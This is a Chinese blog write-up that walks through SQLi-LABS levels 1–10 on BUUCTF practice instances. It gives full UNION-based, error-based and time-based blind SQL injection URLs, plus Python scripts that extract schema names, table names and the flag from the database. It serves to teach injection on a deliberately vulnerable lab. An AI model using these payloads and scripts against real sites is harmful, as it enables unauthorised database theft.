SQLi-LABS(1~10关详解)

最新推荐文章于 2024-04-27 08:59:52 发布
最新推荐文章于 2024-04-27 08:59:52 发布
阅读量6.3k 收藏 47
点赞数 9
分类专栏: CTF 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41429081/article/details/101167892
版权

SQLi-LABS Less-1

查看题目环境

首先可以看到这题传入id=1后,会有回显,显示出该条记录

测试注入点

构造payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=1'or '1'='1

页面正常回显

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=1'and '1'='2

页面无数据显示

由此可以判断出:此处具有Sql注入漏洞

SQL注入

因为前面测得具有回显,所以采取union联合查询
流程为

查找列数

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=1' order by 3 --+

–+用于注释掉sql语句后面的内容,最终查出返回的列数为3列(列数一个一个试,最大的一个数,且不报Unknown column ‘*’ in ‘order clause’)

查询数据库

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)'

这边id传入一个数据库中没有的值即可,因为如果是数据库中存在的值,即会返回多条记录,会显示前一个找到的值,而我们想要的将无法显示。
同时我们使用GROUP_CONCAT将查询到的数据库名拼接显示

查询数据库中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" )'

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag')'

查数据

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag)'

SQLi-LABS Less-2

查看题目环境

首先可以看到这题传入id=1后,会有回显,显示出该条记录

测试注入点

构造payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1'

可以发现报错信息如下,我们可以知道是MariaDB数据库

发现我们用单引号闭合是多余的
payload

 http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1 or '1'='1'

正常显示

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1 and '1'='2'

页面无数据显示

由此可以判断出:此处具有Sql注入漏洞

SQL注入

因为前面测得具有回显,所以采取union联合查询
流程为

查找列数

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1  order by 3 --+

–+用于注释掉sql语句后面的内容,最终查出返回的列数为3列(列数一个一个试,最大的一个数,且不报Unknown column ‘*’ in ‘order clause’)

查询数据库

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)

这边id传入一个数据库中没有的值即可,因为如果是数据库中存在的值,即会返回多条记录,会显示前一个找到的值,而我们想要的将无法显示。
同时我们使用GROUP_CONCAT将查询到的数据库名拼接显示

查询数据库中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" )

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag')

查数据

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag)

SQLi-LABS Less-3

查看题目环境

首先可以看到这题传入id=1后,会有回显,显示出该条记录

测试注入点

构造payload
http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1
可以发现报错信息如下,我们可以知道是MariaDB数据库

发现我们应该用’)闭合
payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1')  or '1'='1' --+

正常显示

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1')  and '1'='2' --+

页面无数据显示

由此可以判断出:此处具有Sql注入漏洞

SQL注入

因为前面测得具有回显,所以采取union联合查询
流程为

查找列数

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1') order by 3 --+

–+用于注释掉sql语句后面的内容,最终查出返回的列数为3列(列数一个一个试,最大的一个数,且不报Unknown column ‘*’ in ‘order clause’)

查询数据库

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata) --+

这边id传入一个数据库中没有的值即可,因为如果是数据库中存在的值,即会返回多条记录,会显示前一个找到的值,而我们想要的将无法显示。
同时我们使用GROUP_CONCAT将查询到的数据库名拼接显示

查询数据库中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" ) --+

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag') --+

查数据

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag) --+

SQLi-LABS Less-4

查看题目环境

首先可以看到这题传入id=1后,会有回显,显示出该条记录

测试注入点

构造payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1'

发现用单引号闭合没有报错

尝试使用双引号,可以发现报错信息如下,我们可以知道是MariaDB数据库

发现我们应该用")闭合
payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1")  or '1'='1' --+

正常显示

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1")  and '1'='2' --+

页面无数据显示

由此可以判断出:此处具有Sql注入漏洞

SQL注入

因为前面测得具有回显,所以采取union联合查询
流程为

查找列数

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1") order by 3 --+

–+用于注释掉sql语句后面的内容,最终查出返回的列数为3列(列数一个一个试,最大的一个数,且不报Unknown column ‘*’ in ‘order clause’)

查询数据库

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata) --+

这边id传入一个数据库中没有的值即可,因为如果是数据库中存在的值,即会返回多条记录,会显示前一个找到的值,而我们想要的将无法显示。
同时我们使用GROUP_CONCAT将查询到的数据库名拼接显示

查询数据库中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" ) --+

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag') --+

查数据

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag) --+

SQLi-LABS Less-5

查看题目环境

首先可以看到这题传入id=1后,如果存在id,则会返回You are in…否则就没有任何显示

测试注入点

构造payload

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1'

有报错信息如下
由于没有页面没有数据显示,所以无法使用Union联合查询,尝试报错注入

SQL注入

因为前面测得没有回显数据,所以采取报错注入
报错注入:
(1). 通过floor报错

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字符
(2). 通过updatexml报错

and updatexml(1,payload,1)

同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效
(3). 通过ExtractValue报错

and extractvalue(1, payload)

我比较喜欢用的是floor报错注入,因为能返回的字符串长度最长
流程为

查询数据库

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

通过报错注入,因为所有数据库拼接的长度大于了64个字符,所以使用limit 一个一个数据库查

查询数据库中的表

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查表中的字段

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查数据

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

SQLi-LABS Less-6

查看题目环境

首先可以看到这题传入id=1后,如果存在id,则会返回You are in…否则就没有任何显示

测试注入点

构造payload

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1'

正常显示

构造payload

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1"


有报错信息如下
由于没有页面没有数据显示,所以无法使用Union联合查询,尝试报错注入

SQL注入

因为前面测得没有回显数据,所以采取报错注入
报错注入:
(1). 通过floor报错

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

其中payload为你要插入的SQL语句
需要注意的是该语句将 输出字符长度限制为64个字符
(2). 通过updatexml报错

and updatexml(1,payload,1)

同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效
(3). 通过ExtractValue报错

and extractvalue(1, payload)

我比较喜欢用的是floor报错注入,因为能返回的字符串长度最长
流程为

查询数据库

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

通过报错注入,因为所有数据库拼接的长度大于了64个字符,所以使用limit 一个一个数据库查

查询数据库中的表

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查表中的字段

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查数据

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

SQLi-LABS Less-7

查看题目环境

首先可以看到这题传入id=1后,如果存在id,则会返回You are in…Use outfile…

输入不存在的id,或者尝试sql注入都不会显示具体报错信息

所以联合查询和报错注入都失效了

测试注入点

构造payload

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1'))

正常显示

SQL注入

首先,由题目环境观察可知,联合查询和报错注入都用不了,但是这边又可以执行我们输入的东西,所以我是用的时间盲注。

查询列数

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) order by 3 --+

时间盲注脚本

使用脚本的sleep函数时间自行控制,因为不同服务器的响应时间不同,sleep时间越久,越准确。因为若sleep时间短了,有可能因为本身服务器响应较慢导致爆破出来的值错误

import requests
import time
flag = ''
table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}"
while True:
    for i in table:
        ss = time.time()
        data = {
            'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
            'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
            'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
            'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
        }
        #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['datebase']+")--+" #查找数据库

        #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['table']+")--+" #查表名
        #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['column']+")--+" #查字段名
        url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['flag']+")--+" #查数据
        t=requests.get(url)
        
        if time.time()-ss>=4:
            flag += i
            print (flag)

        break

SQLi-LABS Less-8

查看题目环境

首先可以看到这题传入id=1后,如果存在id,则会返回You are in…否则就没有任何显示

测试注入点

构造payload

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1'

没有回显
构造payload

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1'--+

成功闭合

SQL注入

我这边使用SQL盲注得到flag
主要是让他执行查询,然后将查到的值与我们的table比较,若相等则调用SLEEP函数,通过判断响应时间,爆破出数据库内容

查询列数

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1' order by 3 --+

时间盲注脚本

使用脚本的sleep函数时间自行控制,因为不同服务器的响应时间不同,sleep时间越久,越准确。因为若sleep时间短了,有可能因为本身服务器响应较慢导致爆破出来的值错误

import requests
import time
flag = ''
table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}"
while True:
    for i in table:
        ss = time.time()
        data = {
            'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i),
            'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i),
            'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i),
            'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
        }
        #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['datebase']+")--+" 查找数据库
        #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['table']+")--+" 查表名
        #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['column']+")--+" 查字段名
        url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['flag']+")--+" #查数据
        t=requests.get(url)
        
        if time.time()-ss>=4:
            flag += i
            print (flag)

        break

SQLi-LABS Less-9

查看题目环境

首先可以看到这题id无论传入什么,都会显示这个页面

测试注入点

因为没有任何有意义的回显,所以一般就是时间盲注了,但是由于不知道他的sql语句是怎么样的,所以写个脚本测试下如何去闭合前面内容

import requests
import time
ss = time.time()
url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1'%20and%20sleep(5)--+"
t=requests.get(url)
if time.time()-ss>=4:
    print("is Time")

SQL注入

时间盲注脚本

使用脚本的sleep函数时间自行控制,因为不同服务器的响应时间不同,sleep时间越久,越准确。因为若sleep时间短了,有可能因为本身服务器响应较慢导致爆破出来的值错误

import requests
import time
flag = ''
#table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}"
n=1
while True:
    for i in range(128):
        ss = time.time()
        data = {
            'datebase':"SELECT schema_name FROM information_schema.schemata limit 0,1",
            'table':'SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1',
            'column':'SELECT column_name FROM information_schema.columns WHERE table_name = "flag"',
            'flag':'SELECT flag FROM ctftraining.flag limit 0,1'
        }
        #url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['datebase']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" #查找数据库
        #url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['table']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" 查表名
        #url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['column']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" 查字段名
        url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['flag']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" #查数据
        t=requests.get(url)
        if time.time()-ss>=4:
            n=n+1
            flag += chr(i)
            print (flag)
            break

SQLi-LABS Less-10

查看题目环境

首先可以看到这题id无论传入什么,都会显示这个页面

测试注入点

因为没有任何有意义的回显,所以一般就是时间盲注了,但是由于不知道他的sql语句是怎么样的,所以写个脚本测试下如何去闭合前面内容

import requests
import time
ss = time.time()
url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22%20and%20sleep(5)--+"
t=requests.get(url)
if time.time()-ss>=4:
    print("is Time")

发现用双引号成功闭合

SQL注入

时间盲注脚本

使用脚本的sleep函数时间自行控制,因为不同服务器的响应时间不同,sleep时间越久,越准确。因为若sleep时间短了,有可能因为本身服务器响应较慢导致爆破出来的值错误

import requests
import time
flag = ''
table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}"
while True:
    for i in table:
        ss = time.time()
        data = {
            'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
            'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
            'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
            'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),
        }
        #url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['datebase']+" --+" #查找数据库
        #url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['table']+"--+" #查表名
        #url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['column']+"--+" #查字段名
        url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['flag']+"--+" #查数据
        t=requests.get(url)
        if time.time()-ss>=4:
            flag += i
            print (flag)
            break
CTF小白
关注
  • 9
    点赞
  • 47
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1549
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
BUUCTF/sqli-labs 1-23
weixin_44041994的博客
03-21 876
因为#号后面都被注释了。这输入正确用户名密码后,页面显示的不再是User-Agent,而是变成了Refer,我们通过抓包更改Refer,发现和18差不多,只不过18有3个参数,而19只有两个参数。上面提示让我们使用outfile,outfile是sql的语法,可以通过into outfile命令,将查询到的结果写入目标路径,在知道目标系统的绝对路径时可以使用,如。这通过测试,发现无论sql语句正确与否,返回的信息都是一样的,这样就不符合布尔注入的前提了,布尔盲注只适用于正确与错误结果不同的情况。
Sqli-lab教程-史上最全详解(1-22通
最新发布
Innocence_0的博客
04-27 1038
Less-1 联合注入Less-2Less-3Less-4Less-5 报错注入/布尔盲注/时间盲注Less-6 报错注入/布尔盲注/时间盲注Less-7 文件导出Less-8 布尔盲注/时间盲注Less-9 时间盲注Less-10 时间盲注Less-11 post注入Less-12 post注入Less-13 post盲注Less-14 post盲注Less-15 时间盲注Less-16 时间盲注Less-17 修改密码Less-18 user-agent头注入。
sqli-labs buuctf平台+本地环境 全全解 不是很详解(<_<)
weixin_48083470的博客
07-12 1873
sqli-labs 在buuctf平台 搜索sqli-labs 可以更加模拟线上赛的环境 less-1 less-5 ?id=0' and(select extractvalue(1,concat('~',(select database())))) %23 报错注入详细讲解:https://blog.csdn.net/silence1_/article/details/90812612 less-6 发现不报错了,用布尔盲注 写python代码来跑出内容 import requests url
注入攻击(一)--------SQL注入(结合BUUCTF sqli-labs)
Young12138的博客
05-10 1804
为了准备信息安全技术课程汇报做的笔记,想着做了也是做了,不如分享出来给想我一样的初学者学习。本人之前没有做过CTF,也没有学过SQL注入,零基础,所以大佬可以先行离开。内容是SQL注入XPath注入HTML注入
web靶场 --- sqli-labs
L0g1c的博客
07-06 1301
SQL注入的本质是用户输入的数据被当作代码执行mysql语法:查库: 查表:查列:查字段: 查看是否有注入 确实存在SQL注入漏洞查看有多少列先使用 再使用 所以得到users表有3列查看哪些数据可以回显[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-drLNqXTv-1657118499948)(https://raw.githubusercontent.com/Ckingt-k/photos/main/image-20220706192047368.png)]查看当前数
【网络安全CTF】BUUCTF(Basic篇)
信安是不可或缺的一部分!
05-11 6136
参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171。admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装sqli-labs靶场环境 本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs.rar
12-22
SQL注入练习平台搭建,需要PHPstudy等对应的工具配合使用,很适合小白练习,收悉SQL的注入由浅入深 东西是好东西网上也有,后期会出教程。
[CTFSHOW]sqli-labs
Y4tacker的博客
04-08 1662
文章目录前言web517web518web519web520web521web522web523web524web525web526web527web528web529web530web531web532web533web534web535web536web537web538web539web540 前言 由于都是简单题就随便写了,SQL注入不懂的百度先学最基本的吧 web517 注意flag不在当前security里 union select group_concat(schema_name) from
CTFshow_web入门_sqli-labs
weixin_43896504的博客
07-21 176
SQL注入labs
最详细sqli-labs平台前十讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 2609
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
sqli-labs-master前10
07-28
回答: 在sqli-labs-master前10中,可以使用不同的注入方法来获取数据库和表的信息。其中,联合查询、报错注入和sqlmap是常用的注入方法。联合查询可以通过判断注入点的类型、判断列数和使用order by语句来获取表名...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值